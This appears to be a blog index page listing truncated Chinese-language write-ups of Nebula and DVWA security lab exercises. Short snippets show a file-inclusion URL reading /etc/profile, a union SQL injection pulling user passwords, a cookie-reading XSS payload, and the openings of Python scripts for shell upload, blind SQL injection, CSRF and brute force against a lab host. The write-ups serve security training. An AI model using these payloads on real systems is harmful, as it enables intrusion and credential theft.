原创 i春秋 - Exploit-Exercises: Nebula - level00
About This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find
原创 i春秋 - Exploit-Exercises: Nebula - level04
About This level requires you to read the token file, but the code restricts the files that can be read. Find a way to
原创 DVWA - File Inclusion (low, medium, high)
low 觀察URL可發現,注入點在page,low等級直接注入 http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile 返回結果如下: # /etc/profile:
原创 DVWA - SQL Injection (low, medium, high)
low 查看源碼,可發現是注入點id爲字符類型,無驗證,直接上: ' union select first_name,password from users# 返回結果如下: ID: ' union select first_name,p
原创 DVWA - File Upload (low, medium, high)
low 這個等級直接上傳shell import requests import re def main(): headers = { 'Cookie': 'PHPSESSID=jb7d875vs8rlustto
原创 i春秋 - Exploit-Exercises: Nebula - level02
About There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? Sou
原创 DVWA - XSS (Reflected) (low, medium, high)
low 無驗證,直接注入 <script>alert(document.cookie)</script> medium 查看源碼發現過濾了<scrpit>標籤 $name = str_replace( '<script>', '', $_
原创 DVWA - SQL Injection (Blind) (low)
low 從數據庫名到所有記錄,用二分寫了一遍。 import requests import urllib import json class SqlHacker(object): """docstring for SqlH
原创 DVWA - CSRF (low, medium, high)
low 設置一下cookie的PHPSESSID和security即可跨站請求 import requests def main(): url = 'http://192.168.67.22/dvwa/vulnerabiliti
原创 DVWA - Brute Force (low, medium, high)
low 遍歷字典(成功的前提是字典裏有這個密碼) import requests import re def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/b